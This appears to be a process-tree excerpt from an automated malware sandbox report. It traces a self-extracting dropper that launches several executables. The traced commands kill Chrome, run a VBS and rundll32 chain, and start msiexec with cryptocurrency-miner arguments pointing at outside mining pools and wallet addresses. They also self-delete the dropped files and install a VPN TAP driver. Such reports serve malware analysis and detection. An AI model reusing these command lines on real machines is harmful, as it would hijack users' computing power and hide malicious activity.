- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1532
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1148 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵PID:4168
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
PID:4248
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Program Features.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\Full Program Features.exe"4⤵PID:4868
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"5⤵PID:4996
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install6⤵PID:3084
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"4⤵PID:5056
-
C:\Users\Admin\AppData\Roaming\A86B.tmp.exe"C:\Users\Admin\AppData\Roaming\A86B.tmp.exe"5⤵PID:1144
-
C:\Users\Admin\AppData\Roaming\A86B.tmp.exe"C:\Users\Admin\AppData\Roaming\A86B.tmp.exe"6⤵PID:5504
-
-
-
C:\Users\Admin\AppData\Roaming\AA50.tmp.exe"C:\Users\Admin\AppData\Roaming\AA50.tmp.exe"5⤵PID:4264
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵PID:6000
-
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 99996⤵PID:3648
-
-
-
C:\Users\Admin\AppData\Roaming\AB4B.tmp.exe"C:\Users\Admin\AppData\Roaming\AB4B.tmp.exe"5⤵PID:4256
-
C:\Windows\SysWOW64\cmd.exe/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\AB4B.tmp.exe6⤵PID:6192
-
C:\Windows\SysWOW64\timeout.exetimeout /t 37⤵
- Delays execution with timeout.exe
PID:6900
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"5⤵PID:5364
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:5864
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"4⤵PID:4352
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:4296
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:4356
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4640
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:4852
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:4132
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:4908
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:5752
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:5208
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding FB014BBDD378B9E12EC8C28EB18C3986 C2⤵PID:5552
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding AAC37DAA424461F9CC021B2C347C40D42⤵PID:4756
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:5228
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:3156
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:4388
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:7052
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:7136
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:7200
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8048
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:4396
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:7716
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵PID:7296
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{1ea5ab73-9060-6d42-8f2f-0e0bfce4fd01}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵PID:7812
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000174"2⤵PID:6592
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:7020
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:6388
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:8452
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:8576
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵PID:8712